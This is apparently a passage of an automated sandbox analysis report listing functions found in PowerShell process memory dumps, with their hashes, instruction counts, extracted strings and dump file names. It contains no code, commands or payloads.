Opcode ID: ef8e3dfdfec9ecca4d4d32c80bc2b8aba2b37418277887bae9d5e24f30255ad1
Instruction ID: ac6aef96578777c318d96ae51281914ac3c4735fa4d9f1c212a4ef5f0f37c9b7
Opcode Fuzzy Hash: ef8e3dfdfec9ecca4d4d32c80bc2b8aba2b37418277887bae9d5e24f30255ad1
Instruction Fuzzy Hash: AFF0E5352897916FC31B933DAC10C9F7FA6AFC216031841AEE056CF263CA50D81AC7E6

Function 04EADE48 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb783b0ecdd7e87d579c4d5816b62422584e01f72aa57e4fc15d452504ed6aac
Instruction ID: 27d56c02d537f6a863e79e7e3cc8b8167148b963188e691df37563813228e204
Opcode Fuzzy Hash: fb783b0ecdd7e87d579c4d5816b62422584e01f72aa57e4fc15d452504ed6aac
Instruction Fuzzy Hash: BDE065357002108F83009B1DD888C6AB7FAEFCE72931A50AAE549CB734CA61EC01CB90

Function 04EA9542 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea98530fdc4f53bcbefdacf13477030a50e32b3bc3fdd7a417573e3943beedf2
Instruction ID: 1967335d065452915f3267fd2ffdbd65070d6bf0ad99ba927c9ce49b93e44fbb
Opcode Fuzzy Hash: ea98530fdc4f53bcbefdacf13477030a50e32b3bc3fdd7a417573e3943beedf2
Instruction Fuzzy Hash: 87E09A3174A2E21B8B56A2BD28101BE6EDA5FC216870900BED945CF293D844AC1283B2

Function 04EADCD9 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25a3ad27ead28d1b37971323538e1d7e883366900da439d49ce8118697ff31ed
Instruction ID: 8344d4dc41c34c08759fd237943528a12a469872d9a04fe9c57e9169946b5808
Opcode Fuzzy Hash: 25a3ad27ead28d1b37971323538e1d7e883366900da439d49ce8118697ff31ed
Instruction Fuzzy Hash: 44E0E531B00050ABCB09866CD8008EDBBA6AFC9210F04807EE506AB641DA216426D6E0

Function 04EA896A Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81ca5b6f2d1b1f41399f06ce3e02dfaa7f3ddd91ec40416cf3a07fe88c37dc6a
Instruction ID: b3fda02e3beedd9138fcf7f1468e32726c266e4bfd64f76db5e11f116f547456
Opcode Fuzzy Hash: 81ca5b6f2d1b1f41399f06ce3e02dfaa7f3ddd91ec40416cf3a07fe88c37dc6a
Instruction Fuzzy Hash: 57F0A73430D3915BCB0AB774A41C5AE7F719BC1214F08006FD505CB283CF284816C396

Function 04EA9168 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53b9d027bf9b7141edb99664aed4af2d2f08190b261e3a4f188c559425e1ba90
Instruction ID: 2ab01b89a5cdcfc768f9bdc6ec684b1b498838aa6adb03a77337868704bbb8f9
Opcode Fuzzy Hash: 53b9d027bf9b7141edb99664aed4af2d2f08190b261e3a4f188c559425e1ba90
Instruction Fuzzy Hash: 00F06D70A043044BD764EFB8E49C39ABBE5FB44314F10442DD54EC7340DB39A881CB90

Function 04EAAF88 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d840f72fb9ee26c20680c5ca9650056c83cbb8713526ebd424632ca79aae947
Instruction ID: cc6e1fcba4d90a79cbb80ef3a16932d7d9583bfb86a142729d39b13e5cf35254
Opcode Fuzzy Hash: 1d840f72fb9ee26c20680c5ca9650056c83cbb8713526ebd424632ca79aae947
Instruction Fuzzy Hash: EBE0862634D3D11E5B5B913E642046A6FB38AC712130E80FAD084CF252C8518C068395

Function 04EA8978 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77599b3954f0c68250cab264f7d49cea2a4fefa30ea6fa6fd9d9e42088cb80e4
Instruction ID: 06614f598c87386ccc179a0bfc5805644247b7a7f912ca811f03966c0cf238a0
Opcode Fuzzy Hash: 77599b3954f0c68250cab264f7d49cea2a4fefa30ea6fa6fd9d9e42088cb80e4
Instruction Fuzzy Hash: EDE04F3570C61557DF09BBB5A41C2AEBA56EBC4729F04002ED60A87341CF69691683DA

Function 04EA9550 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83aff85bed0a71fd4cf4f1d52dae80dbe5a335015728eedad602f74a2b5a98d2
Instruction ID: 122320867220255c5ecbe04d053c903dbc046d54a192eff536f6dab74571e7f7
Opcode Fuzzy Hash: 83aff85bed0a71fd4cf4f1d52dae80dbe5a335015728eedad602f74a2b5a98d2
Instruction Fuzzy Hash: 2CD0A732B0122117165472FE28016BBA5CEAFC45AD7051036DA09CF342EC44FC2243F1

Function 04EADCE8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: e018d0222ef56fb1f16c50254547270be4f88be640b64512e4d6df131a348dfd
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: E6E08635B1001497CB08995DD8108EDF7AADBCC220F04C07AD90AAB740DA32791586E1

Function 04EADC98 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bee80ff0a6b3bd5adc13a6fb889479c5e40d4bd6a9258d639e0016b2fd76e679
Instruction ID: d94e00359e371a8e324dba6f025e7cd7e92ac78a7fed6827647a615248c70e27
Opcode Fuzzy Hash: bee80ff0a6b3bd5adc13a6fb889479c5e40d4bd6a9258d639e0016b2fd76e679
Instruction Fuzzy Hash: EFE08C357806151B8619A66EA81085FB6EBEFC4665350442EF1298B720DEA0E80587D5

Function 04EA8800 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecd1d5d9c9201d5f1e44961b14cfcc1cb51b6acd10039bc4230c908b1fdf388f
Instruction ID: fcfabb297cfed06d54e8bb192b69da52dd70814a777767fcf71776604a4d3edb
Opcode Fuzzy Hash: ecd1d5d9c9201d5f1e44961b14cfcc1cb51b6acd10039bc4230c908b1fdf388f
Instruction Fuzzy Hash: 6CE09230A4D2866FCB49FBB8D40686FBFB1EB45200B0441BDD909CB243D7215406CBC1

Function 04EA8739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93d2a1480dc71c2a0ee82e0106f1784567fd7bb36cc394fc342d7c37f14ceec0
Instruction ID: c8fd6cd0b55c675eb63cb6a1c8a82e56fa041e1582fee411bf1bf453da19db48
Opcode Fuzzy Hash: 93d2a1480dc71c2a0ee82e0106f1784567fd7bb36cc394fc342d7c37f14ceec0
Instruction Fuzzy Hash: 89E04F31A0C0868BCF4EFBB4D8594FDBF30EA15311B50449DD55297092EB21195ACBC0

Function 04EAF460 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cb45652ccd0ee33a91def8867165dfc3629fb6b846ffa5596d6690a668861b8
Instruction ID: d7c231d680bb27dea94ed0aa687d13ac972a3810f497172bc15e39616c3e97bb
Opcode Fuzzy Hash: 8cb45652ccd0ee33a91def8867165dfc3629fb6b846ffa5596d6690a668861b8
Instruction Fuzzy Hash: F5E04F70E4114A9F8780DFBCC44059DFBF0EB48200B5489AED50CEB711E7319612CF80

Function 04EAF470 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 9954aa08bbfa8f3e0d9cdc95f79ef42c803a7b85450589390dcd53ef8b96d592
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: AED06270D042099F8780DFADC9415ADFBF4EB48200F5085AA8919D7301F7315612CBD1

Function 04EA8748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44260d69d434aef2db9d4e0a5e1a5a4771894d27950fc5f0be694c13e52460e9
Instruction ID: fb57bb15c6d715ba1ad49b53b41095e57453f5327f59481f703fb24f0e64532e
Opcode Fuzzy Hash: 44260d69d434aef2db9d4e0a5e1a5a4771894d27950fc5f0be694c13e52460e9
Instruction Fuzzy Hash: 25D0173080C1098BCF4CFBE4E81A4BDBB34FB10301F50056DE91792191EA302A5ACBC0

Function 04EA8810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91cbf593d8fd033c4ad8a063dcc846b3f6d6765d95a7b3749e8e05ff7e04740
Instruction ID: 71daf1df302c86163a00c04cb7cf884ce8aede27d3a0e4b9c59eef1ff3917be6
Opcode Fuzzy Hash: a91cbf593d8fd033c4ad8a063dcc846b3f6d6765d95a7b3749e8e05ff7e04740
Instruction Fuzzy Hash: D3D01734A0C20A9BCB48FFA4E44686EBBB5EB44200F104169DD0993340EA306811CBC1

Function 04EA791A Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c8f147161b5ba0a667007c76081f1a2936f1f0f69e6cb05e6d61f43d2f7794f
Instruction ID: fb81dc30f691eca111df1610f41ca1b0b5ef7492c5b5f3a8d1c74dc9489e96fa
Opcode Fuzzy Hash: 3c8f147161b5ba0a667007c76081f1a2936f1f0f69e6cb05e6d61f43d2f7794f
Instruction Fuzzy Hash: D5D09E301097498FC30AAB75D4688507B74EF4620475104DAD40A4F5F3CA25A85ED755

Function 04EA7E90 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a18edb8b3e27f8392256012c3bc24e3066b10490414ac0982b996a02fc2ceb1e
Instruction ID: 138c72a872c83f4722a189f4b797e71e0634355a583f1c6d03b568c55d000ae3
Opcode Fuzzy Hash: a18edb8b3e27f8392256012c3bc24e3066b10490414ac0982b996a02fc2ceb1e
Instruction Fuzzy Hash: AFC08C214087904FEF06BB758CB14503FB09E8720031706CBCC02CB0B2CE248C2EE341

Function 04EA7928 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c824e9817c2ad96d5d7f35c437ea69ff248e7ed2b5e459b7b0861ef3a5c1442
Instruction ID: 870292ad53aa217bcf8f56c4fe5fdc405c2da8940403cbe6200f3e3f1d6c709e
Opcode Fuzzy Hash: 0c824e9817c2ad96d5d7f35c437ea69ff248e7ed2b5e459b7b0861ef3a5c1442
Instruction Fuzzy Hash: F7B09231044709CFC2496F75E4488157329BB4021979009A8E90E0A392CE36E889CA49

Non-executed Functions

Function 07963928 Relevance: 12.8, Strings: 10, Instructions: 316COMMON

Download Yara Rule

Strings

$^q, xrefs: 0796393A
tP^q, xrefs: 079639A5
$^q, xrefs: 0796396C
4'^q, xrefs: 07963B29
4'^q, xrefs: 07963B35
%l, xrefs: 07963A0F
$^q, xrefs: 07963C0E
$^q, xrefs: 07963960
tP^q, xrefs: 079639B1
%l, xrefs: 07963A1D

Memory Dump Source

Source File: 00000007.00000002.1728549735.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7960000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$%l$%l
API String ID: 0-4025564121
Opcode ID: eb293487343597232b9881fd226d7352d9c54f4c167be5633ed62816b5781cef
Instruction ID: db2310fc5220dc0bf46a832dbf6f0d82471f0ecc71b8c6e4ea902fa153ec56ec
Opcode Fuzzy Hash: eb293487343597232b9881fd226d7352d9c54f4c167be5633ed62816b5781cef
Instruction Fuzzy Hash: 3AA178B27043099FC7148B799808B66BBFAAFC5718F1486AFE805CB392DA71C845C761

Function 07960FB8 Relevance: 12.7, Strings: 10, Instructions: 184COMMON

Download Yara Rule

Strings

fcq, xrefs: 079610A2
$^q, xrefs: 07961044
`Q^q, xrefs: 079610ED
tP^q, xrefs: 07961127
84-l, xrefs: 079610D4
$^q, xrefs: 07961229
$^q, xrefs: 07961065
`Q^q, xrefs: 07961153
$^q, xrefs: 07961253
$^q, xrefs: 07961081

Memory Dump Source

Source File: 00000007.00000002.1728549735.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7960000_powershell.jbxd

Similarity

API ID:
String ID: fcq$84-l$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-4227535492
Opcode ID: 4f13ba6d5b2de0a9316699a336f03a8b1c2bc1bb303c542d853fa3eda677c12d
Instruction ID: a2b7609399aa116aac42f717f6bd8a517a678ddc1cb9c3dc63a54e8cdc28d781
Opcode Fuzzy Hash: 4f13ba6d5b2de0a9316699a336f03a8b1c2bc1bb303c542d853fa3eda677c12d
Instruction Fuzzy Hash: 8E61C0F0A9020EDFDF28CE44C54CBAAB7FABB45349F258655E8019B294C771DD84CBA1

Function 07960488 Relevance: 9.2, Strings: 7, Instructions: 486COMMON

Download Yara Rule

Strings

4'^q, xrefs: 079605F6
r/l, xrefs: 0796092B
fcq, xrefs: 0796094B
r/l, xrefs: 07960935
4'^q, xrefs: 07960962
4'^q, xrefs: 079605EC
4'^q, xrefs: 0796096E

Memory Dump Source

Source File: 00000007.00000002.1728549735.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7960000_powershell.jbxd

Similarity

API ID:
String ID: fcq$4'^q$4'^q$4'^q$4'^q$r/l$r/l
API String ID: 0-2858298197
Opcode ID: f809cd9c05d826c8c1fdc021c786a9a4a3e3c7ed3ebf726284f927c003f8ead3
Instruction ID: 3cc8d1e4341c17306acc860d7b630ea15513bf1677ffd092f3b306b5c17abb70
Opcode Fuzzy Hash: f809cd9c05d826c8c1fdc021c786a9a4a3e3c7ed3ebf726284f927c003f8ead3
Instruction Fuzzy Hash: 90F178B17443498FCB148B6CA458A6ABBA6EFC2214F14C5BBD445CF351EB71CC86C7A2

Function 07963678 Relevance: 8.9, Strings: 7, Instructions: 185COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0796372E
%l, xrefs: 0796387B
$^q, xrefs: 079637FF
4'^q, xrefs: 07963722
$^q, xrefs: 07963836
%l, xrefs: 0796386D
$^q, xrefs: 0796382A

Memory Dump Source

Source File: 00000007.00000002.1728549735.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7960000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$%l$%l
API String ID: 0-908776246
Opcode ID: 580d9cedb785165c7a994a31ce8ee698371be5e790a809432e84c5cbcdcc96e4
Instruction ID: 5b51f7100b7c33ed4178e90525702c7e7d0ead9d53d2754bdba7e617eacc0a3f
Opcode Fuzzy Hash: 580d9cedb785165c7a994a31ce8ee698371be5e790a809432e84c5cbcdcc96e4
Instruction Fuzzy Hash: 31518BF570430A9FCB244B6998082A7FBF9AFC2624F24867BD405CB351DB31C885C791

Function 04EAEBB8 Relevance: 8.9, Strings: 7, Instructions: 180COMMON

Download Yara Rule

Strings

$^q, xrefs: 04EAECB0
$^q, xrefs: 04EAED55
$^q, xrefs: 04EAED21
$^q, xrefs: 04EAED07
$^q, xrefs: 04EAED6F
$^q, xrefs: 04EAED3B
,bq, xrefs: 04EAEC0D

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID: ,bq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-13851718
Opcode ID: 286a48bca73e906268b064887b20fa13de31128075fd873d009647143937d8b6
Instruction ID: 4291a9c88ff45397a351989c17436353507edc08e44949b89b5d1bd794c235dc
Opcode Fuzzy Hash: 286a48bca73e906268b064887b20fa13de31128075fd873d009647143937d8b6
Instruction Fuzzy Hash: D3517E303C45188FCB29AB7D855896C7BD7AF89B9831024EAE026CF375EE15FC528752

Function 04EA7A09 Relevance: 6.5, Strings: 5, Instructions: 243COMMON

Download Yara Rule

Strings

tM/l, xrefs: 04EA7ABC
`_q, xrefs: 04EA7C2C
`_q, xrefs: 04EA7B8A
`_q, xrefs: 04EA7B0B
`_q, xrefs: 04EA7CAA

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID: tM/l$`_q$`_q$`_q$`_q
API String ID: 0-2896919081
Opcode ID: 3607440e4f01f13f17fa4fd9c9d0ced608f073c91ddfdce9ecfe573315351b66
Instruction ID: 57e07f07ffc10e7cb8b9f315952fbebafbfa9d20e716927887357cc384928d19
Opcode Fuzzy Hash: 3607440e4f01f13f17fa4fd9c9d0ced608f073c91ddfdce9ecfe573315351b66
Instruction Fuzzy Hash: 26B1B374E002099FDB54DFA9D990A9DFBF2FF88304F108629D819AB314DB70A955CF90

Function 04EA7A18 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

tM/l, xrefs: 04EA7ABC
`_q, xrefs: 04EA7C2C
`_q, xrefs: 04EA7B8A
`_q, xrefs: 04EA7B0B
`_q, xrefs: 04EA7CAA

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID: tM/l$`_q$`_q$`_q$`_q
API String ID: 0-2896919081
Opcode ID: ae723673807f4e94374c77f3e260cca898407c38d3178fef0bd7dfd80bce268d
Instruction ID: e4b51e21b066ce194522ff4893a8135227c225d7c2cef3ce7c95e1029396c3f0
Opcode Fuzzy Hash: ae723673807f4e94374c77f3e260cca898407c38d3178fef0bd7dfd80bce268d
Instruction Fuzzy Hash: 2BB18374E0020A9FDB54DFA9D990A9DFBF2FF88304F108629D819AB314DB70A955CF90

Function 04EAEDE8 Relevance: 5.5, Strings: 4, Instructions: 453COMMON

Download Yara Rule

Strings

$^q, xrefs: 04EAF326
$^q, xrefs: 04EAF110
`Q^q, xrefs: 04EAF2FC
$^q, xrefs: 04EAF16C

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID: `Q^q$$^q$$^q$$^q
API String ID: 0-2499013975
Opcode ID: ff9079106dae336df726cbee11aa679bc4ed6f61418d1224edaca342eb9c0bee
Instruction ID: 48901acb128e1c0a62de9ef56470410bea82ba0d605a6f062660a8e773a30396
Opcode Fuzzy Hash: ff9079106dae336df726cbee11aa679bc4ed6f61418d1224edaca342eb9c0bee
Instruction Fuzzy Hash: AEE136307801158FDB28AB7D941463EB7D7AFC9B18B2454AAD802DF3A4EE75FC428791

Function 04EA71F8 Relevance: 5.2, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

`_q, xrefs: 04EA7C2C
`_q, xrefs: 04EA7B8A
`_q, xrefs: 04EA7B0B
`_q, xrefs: 04EA7CAA

Memory Dump Source

Source File: 00000007.00000002.1717582571.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4ea0000_powershell.jbxd

Similarity

API ID:
String ID: `_q$`_q$`_q$`_q
API String ID: 0-3297199963
Opcode ID: e834ca2af674dd287b9545588d2f6446fe2ebec1b7f6f17234ebd273b71a6c60
Instruction ID: 9d6997db3dac958170f20ca37a5bec9491867e10eae2c8a7faa5362c7e833c89
Opcode Fuzzy Hash: e834ca2af674dd287b9545588d2f6446fe2ebec1b7f6f17234ebd273b71a6c60
Instruction Fuzzy Hash: D0815374E012199FDB54DFA9D990A9DFBF2FF48304F20862AD819AB314D730A955CF90

Function 07965798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 079657C6
$^q, xrefs: 079657F4
$^q, xrefs: 079657AA
$^q, xrefs: 07965800

Memory Dump Source

Source File: 00000007.00000002.1728549735.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7960000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: f52042bc33b061f2d93b20ebe93f114f20116b4edd6551045b71ce5714ca34cf
Instruction ID: 331cdb9e5c0a03afcdd2fea9e52ed9af7489f51ef2024035846ba9a44ac8ebd8
Opcode Fuzzy Hash: f52042bc33b061f2d93b20ebe93f114f20116b4edd6551045b71ce5714ca34cf
Instruction Fuzzy Hash: F6216BB170030A9BDB24592A8C08B37B7DE6BC0B19F25893AA905CF785DDB5D8518361

Function 07960308 Relevance: 5.0, Strings: 4, Instructions: 45COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07960373
$^q, xrefs: 07960352
4'^q, xrefs: 0796037F
$^q, xrefs: 0796035E

Memory Dump Source

Source File: 00000007.00000002.1728549735.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7960000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 6af5b3f4ac3812736cd221364a434593c8324a57501b3a3d90cdf441cde69dcd
Instruction ID: 77bdc18e0043bf211403f98825c2fe183f5669302db93acce4cb5cd560844cb3
Opcode Fuzzy Hash: 6af5b3f4ac3812736cd221364a434593c8324a57501b3a3d90cdf441cde69dcd
Instruction Fuzzy Hash: 0C012B707093894FC32E162C5928D55AFB69FC3905B1905DBC041CF76ACD158C46C3A7

Analysis Process: powershell.exePID: 7464, Parent PID: 6648COMMON

Execution Graph

Execution Coverage:	7.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 0415B491 Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0131f4a82d4e10eefc844a4a6ec48b230b1937fbbfaf93e9c2e1d400fd8af44
Instruction ID: 2ddc1f05ab35ddd9cc880ecf6f9df47bb832aad9088019393ce53262b6ac6382
Opcode Fuzzy Hash: f0131f4a82d4e10eefc844a4a6ec48b230b1937fbbfaf93e9c2e1d400fd8af44
Instruction Fuzzy Hash: E6918271F007149BDB1AEBB484555AEBAE3EF84704B00891DD51AAB350DF74AE0A8BC6

Function 0415B488 Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0db5876e47357fd1cef3fc825dcb602fde9155932de53599592ae432063440ad
Instruction ID: 292bbd7326fdb813bdf6275d7f7b1d85080b6b4fb8fe5477ac9ca7e755889d8b
Opcode Fuzzy Hash: 0db5876e47357fd1cef3fc825dcb602fde9155932de53599592ae432063440ad
Instruction Fuzzy Hash: 73917171F007159BDB1AEBB4C4455AEBBE3EF84704B00891DD51AAB350DF74AE0A8BC6

Function 0415B498 Relevance: .3, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1749333622.0000000004150000.00000040.00000800.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4150000_powershell.jbxd

Similarity

API ID:
String ID:
